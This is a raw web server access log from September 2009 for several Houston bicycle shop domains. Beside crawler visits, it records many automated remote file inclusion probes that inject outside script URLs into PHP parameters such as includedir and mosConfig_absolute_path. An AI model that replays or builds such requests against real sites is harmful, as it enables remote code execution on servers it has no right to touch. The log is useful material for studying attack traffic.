66.194.251.253 - - [11/Sep/2009:01:26:27 -0700] "GET /translations/Polish.txt%20%20//ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.194.251.253 - - [11/Sep/2009:01:26:27 -0700] "GET /translations/Portuguese.txt%20%20//ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.194.251.253 - - [11/Sep/2009:01:26:31 -0700] "GET /translations/Swedish.txt%20%20//ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.90.108.169 - - [11/Sep/2009:01:27:47 -0700] "GET /translations//WebCalendar//tools/send_reminders.php?includedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.90.108.169 - - [11/Sep/2009:01:27:47 -0700] "GET /translations/Portuguese.txt%20%20//WebCalendar//tools/send_reminders.php?includedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
70.90.108.169 - - [11/Sep/2009:01:28:06 -0700] "GET /WebCalendar//tools/send_reminders.php?includedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.90.108.169 - - [11/Sep/2009:01:28:06 -0700] "GET /translations/Swedish.txt%20%20//WebCalendar//tools/send_reminders.php?includedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.90.108.169 - - [11/Sep/2009:01:28:06 -0700] "GET /translations//WebCalendar//tools/send_reminders.php?includedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
79.175.8.102 - - [11/Sep/2009:01:29:11 -0700] "GET /translations/Polish.txt HTTP/1.1" 200 33091 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "houstonbikeshop.com"
66.194.251.253 - - [11/Sep/2009:01:32:09 -0700] "GET /ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.194.251.253 - - [11/Sep/2009:01:32:09 -0700] "GET /translations//ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.194.251.253 - - [11/Sep/2009:01:32:14 -0700] "GET /translations/Korean.txt//ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.194.251.253 - - [11/Sep/2009:01:34:30 -0700] "GET /translations/Finnish.txt//ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.194.251.253 - - [11/Sep/2009:01:35:37 -0700] "GET /translations/Polish.txt//ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.194.251.253 - - [11/Sep/2009:01:35:39 -0700] "GET /translations/Spanish.txt//ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.194.251.253 - - [11/Sep/2009:01:35:40 -0700] "GET /translations/Portuguese.txt//ws/login.php?includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.211.75 - - [11/Sep/2009:01:41:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.75 - - [11/Sep/2009:01:41:36 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
72.30.78.218 - - [11/Sep/2009:01:41:42 -0700] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
65.55.211.62 - - [11/Sep/2009:01:42:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.62 - - [11/Sep/2009:01:42:25 -0700] "GET /logs/access_090710.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
206.225.23.4 - - [11/Sep/2009:02:01:38 -0700] "GET /logs/access.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Sep/2009:02:01:38 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Sep/2009:02:01:38 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Sep/2009:02:01:49 -0700] "GET /logs/access.log%20%20//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Sep/2009:02:01:50 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
206.225.23.4 - - [11/Sep/2009:02:01:50 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.78.116.209 - - [11/Sep/2009:02:07:03 -0700] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.78.116.209 - - [11/Sep/2009:02:07:03 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
121.78.116.209 - - [11/Sep/2009:02:07:03 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
121.78.116.209 - - [11/Sep/2009:02:07:03 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
121.78.116.209 - - [11/Sep/2009:02:07:03 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.78.116.209 - - [11/Sep/2009:02:07:03 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
121.78.116.209 - - [11/Sep/2009:02:07:03 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
121.78.116.209 - - [11/Sep/2009:02:07:03 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.194.251.253 - - [11/Sep/2009:02:10:03 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.194.251.253 - - [11/Sep/2009:02:10:03 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.194.251.253 - - [11/Sep/2009:02:10:06 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.194.251.253 - - [11/Sep/2009:02:10:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.194.251.253 - - [11/Sep/2009:02:10:17 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.194.251.253 - - [11/Sep/2009:02:10:17 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.194.251.253 - - [11/Sep/2009:02:10:17 -0700] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.194.251.253 - - [11/Sep/2009:02:10:23 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
82.195.150.228 - - [11/Sep/2009:02:10:46 -0700] "GET /translations/German.txt/?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
82.195.150.228 - - [11/Sep/2009:02:10:46 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 200 1764 "-" "libwww-perl/5.803" "houstonbikeshop.com"
82.195.150.228 - - [11/Sep/2009:02:10:47 -0700] "GET /translations/?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 200 3847 "-" "libwww-perl/5.803" "houstonbikeshop.com"
121.78.116.209 - - [11/Sep/2009:02:12:40 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
121.78.116.209 - - [11/Sep/2009:02:12:40 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
121.78.116.209 - - [11/Sep/2009:02:12:40 -0700] "GET /translations/Chinese-Big5.txt//tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
121.78.116.209 - - [11/Sep/2009:02:12:40 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
81.176.226.186 - - [11/Sep/2009:02:17:15 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.186 - - [11/Sep/2009:02:17:22 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.186 - - [11/Sep/2009:02:17:22 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.87.112 - - [11/Sep/2009:02:19:57 -0700] "GET /bullitinboard/viewtopic.php?p=14872 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
125.247.60.3 - - [11/Sep/2009:02:24:20 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.247.60.3 - - [11/Sep/2009:02:24:21 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.247.60.3 - - [11/Sep/2009:02:24:21 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.247.60.3 - - [11/Sep/2009:02:24:21 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.247.60.3 - - [11/Sep/2009:02:24:25 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.247.60.3 - - [11/Sep/2009:02:24:28 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
82.195.150.228 - - [11/Sep/2009:02:27:23 -0700] "GET /translations/Dutch.txt/?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
193.234.185.69 - - [11/Sep/2009:02:29:55 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
85.92.222.254 - - [11/Sep/2009:02:29:55 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
72.30.78.218 - - [11/Sep/2009:02:30:16 -0700] "GET /logs/ HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
92.50.143.90 - - [11/Sep/2009:02:32:42 -0700] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Sep/2009:02:32:43 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Sep/2009:02:32:43 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.51.114 - - [11/Sep/2009:02:38:58 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
85.25.152.185 - - [11/Sep/2009:03:06:20 -0700] "GET /logs/scripts.log HTTP/1.1" 200 49337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "houstonbikeshop.com"
220.181.61.215 - - [11/Sep/2009:03:15:06 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "-" "bicyclestoreshouston.com"
220.181.61.215 - - [11/Sep/2009:03:15:17 -0700] "GET /bullitinboard/viewtopic.php?p=15405 HTTP/1.1" 200 533 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "bicyclestoreshouston.com"
200.192.131.74 - - [11/Sep/2009:03:18:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://sportsedu.net/zboard/data/writeskill/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
200.192.131.74 - - [11/Sep/2009:03:18:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://sportsedu.net/zboard/data/writeskill/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "bicyclestoreshouston.com"
200.192.131.74 - - [11/Sep/2009:03:19:20 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://sportsedu.net/zboard/data/writeskill/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
200.192.131.74 - - [11/Sep/2009:03:19:20 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://sportsedu.net/zboard/data/writeskill/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
200.192.131.74 - - [11/Sep/2009:03:19:20 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://sportsedu.net/zboard/data/writeskill/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:22:04 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:22:04 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:22:04 -0700] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:22:58 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:22:58 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:22:58 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.87.112 - - [11/Sep/2009:03:23:47 -0700] "GET /logs/?D=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
85.18.236.8 - - [11/Sep/2009:03:24:05 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
114.4.8.14 - - [11/Sep/2009:03:25:17 -0700] "GET /translations/German.txt/?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
114.4.8.14 - - [11/Sep/2009:03:25:17 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
114.4.8.14 - - [11/Sep/2009:03:25:18 -0700] "GET /translations/?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 200 3847 "-" "libwww-perl/5.79" "houstonbikeshop.com"
85.18.236.8 - - [11/Sep/2009:03:26:22 -0700] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.18.236.8 - - [11/Sep/2009:03:26:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.18.236.8 - - [11/Sep/2009:03:26:22 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:28:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.119.28.103 - - [11/Sep/2009:03:28:17 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.119.28.103 - - [11/Sep/2009:03:28:17 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.119.28.103 - - [11/Sep/2009:03:28:27 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
85.18.236.8 - - [11/Sep/2009:03:28:46 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.18.236.8 - - [11/Sep/2009:03:28:46 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
85.18.236.8 - - [11/Sep/2009:03:29:09 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
85.18.236.8 - - [11/Sep/2009:03:29:09 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
85.18.236.8 - - [11/Sep/2009:03:29:09 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "bicyclestoreshouston.com"
62.119.28.103 - - [11/Sep/2009:03:32:53 -0700] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:33:34 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:33:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.119.28.103 - - [11/Sep/2009:03:41:30 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.211.74 - - [11/Sep/2009:03:59:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.74 - - [11/Sep/2009:03:59:00 -0700] "GET /tmp/?S=D HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
114.4.8.14 - - [11/Sep/2009:04:07:46 -0700] "GET /translations/Dutch.txt/?_SERVER[DOCUMENT_ROOT]=http://shop.kbench.com/xml/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
65.55.211.69 - - [11/Sep/2009:04:10:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.69 - - [11/Sep/2009:04:10:36 -0700] "GET /blog/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
124.158.127.241 - - [11/Sep/2009:04:13:48 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:04:13:48 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:04:13:49 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:04:13:50 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:04:13:50 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
124.158.127.241 - - [11/Sep/2009:04:13:50 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
194.8.75.96 - - [11/Sep/2009:04:14:10 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "bicyclestoreshouston.com"
194.8.75.96 - - [11/Sep/2009:04:14:10 -0700] "GET / HTTP/1.0" 200 1748 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "bicyclestoreshouston.com"
194.8.75.96 - - [11/Sep/2009:04:14:11 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "bicyclestoreshouston.com"
